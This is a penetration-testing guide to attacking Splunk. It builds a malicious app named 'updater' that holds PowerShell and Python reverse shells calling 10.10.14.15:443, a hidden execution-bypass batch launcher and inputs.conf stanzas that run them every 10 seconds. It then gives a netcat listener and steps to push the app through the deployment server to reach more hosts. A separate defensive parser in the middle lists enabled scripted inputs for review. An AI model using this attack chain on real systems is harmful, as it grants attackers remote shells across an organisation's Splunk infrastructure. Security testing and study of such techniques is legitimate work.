12. Attacking Splunk

1. Create Splunk App Directory Structure

Create the necessary directory structure for the Splunk application:

mkdir -p splunk_shell/splunk_shell/bin
mkdir -p splunk_shell/splunk_shell/default
tree splunk_shell/splunk_shell/

2. Create PowerShell Reverse Shell (Windows)

Create a PowerShell script to establish a reverse shell connection:

File: splunk_shell/splunk_shell/bin/rev.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

3. Create a Batch File to Execute PowerShell (Windows)

File: splunk_shell/splunk_shell/bin/run.bat

@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit

4. Create Splunk App Configuration (Windows)

Configure Splunk to run the batch file as a scripted input at a fixed interval (10 seconds in the stanza below).

File: splunk_shell/splunk_shell/default/inputs.conf

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

5. Package the Splunk App

Create a compressed tar archive for easy deployment:

tar -cvzf updater.tar.gz splunk_shell/splunk_shell/

6. Set Up a Netcat Listener

Start a listener on port 443 to capture the reverse shell:

sudo nc -lnvp 443

7. Upload the Splunk App

  1. Navigate to "Apps" -> "Manage Apps" -> "Install app from file" in Splunk Web UI.

  2. Upload updater.tar.gz.

8. Create Python Reverse Shell (Linux)

For Linux systems, create a Python-based reverse shell script.

File: splunk_shell/splunk_shell/bin/rev.py

#!/usr/bin/env python3
# Splunk executes a scripted input directly, so the file needs an interpreter line.
import socket, os, pty

ip = "10.10.14.15"
port = 443
s = socket.socket()
s.connect((ip, int(port)))
# Attach stdin, stdout and stderr to the socket, then spawn an interactive shell
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

9. Create Splunk App Configuration (Linux)

File: splunk_shell/splunk_shell/default/inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell
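As an added defensive example (not part of this guide): the parser below reads the inputs.conf format used in steps 4 and 9 and lists every enabled script:// stanza, so someone reviewing etc/apps or etc/deployment-apps can see which apps run scripts and how often. Stanza syntax, [default] inheritance and the 60-second default interval are Splunk conf behaviour; the SAMPLE text is constructed from the two stanzas above.

```python
# Added example, not part of the guide: parse Splunk inputs.conf stanzas and list
# the enabled [script://...] inputs (script path, interval, sourcetype) for review.
import re
STANZA_RE = re.compile(r"^\[(.+)\]$")
KV_RE = re.compile(r"^([^=#][^=]*?)\s*=\s*(.*)$")

def parse_conf(text):
    """Return {stanza: {key: value}}. Lines starting with '#' are comments;
    settings in a [default] stanza are inherited by every other stanza."""
    stanzas, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if (m := STANZA_RE.match(line)):
            current = stanzas.setdefault(m.group(1), {})
        elif (m := KV_RE.match(line)) and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    defaults = stanzas.pop("default", {})
    return {name: {**defaults, **kv} for name, kv in stanzas.items()}

def enabled_scripted_inputs(text, max_interval=60):
    """List enabled script:// stanzas. 'frequent' is True for a numeric interval
    at or below max_interval seconds; a cron-style interval is listed unranked."""
    findings = []
    for name, kv in parse_conf(text).items():
        if not name.startswith("script://") or kv.get("disabled", "0").lower() in ("1", "true"):
            continue
        interval = kv.get("interval", "60")  # 60 s is Splunk's default for scripted inputs
        try:
            frequent = float(interval) <= max_interval
        except ValueError:
            frequent = False  # cron expression, e.g. "*/5 * * * *"
        script = name[len("script://"):].replace("\\", "/")  # normalise Windows paths
        findings.append({"script": script, "interval": interval,
                         "sourcetype": kv.get("sourcetype"), "frequent": frequent})
    return findings

# Constructed sample: the two stanzas from this guide, the Linux one disabled for contrast.
SAMPLE = r"""[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
[script://./bin/rev.py]
disabled = 1
interval = 10
"""
```

Point `enabled_scripted_inputs` at the text of each default/inputs.conf and local/inputs.conf under an apps directory; any stanza it lists is a process Splunk will launch on that schedule.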

10. Deploy the App to Splunk Deployment Server

Windows Deployment Server:

Copy updater.tar.gz to the deployment apps directory:

cp updater.tar.gz $SPLUNK_HOME/etc/deployment-apps/

Restart Splunk:

splunk restart

Linux Deployment Server:

Copy updater.tar.gz to the deployment apps directory:

cp updater.tar.gz $SPLUNK_HOME/etc/deployment-apps/

Restart Splunk:

sudo systemctl restart splunk

11. Validate Shell Access

After gaining shell access, check the following:

whoami
hostname
pwd

Key Considerations

  • Ensure Netcat listener is active before running the scripts.

  • Modify the IP address and port in scripts based on your setup.

  • Use caution when testing on production systems.

  • Disable PowerShell execution policies if needed.

This guide provides a structured method for setting up a Splunk-based reverse shell for penetration testing and security research purposes.
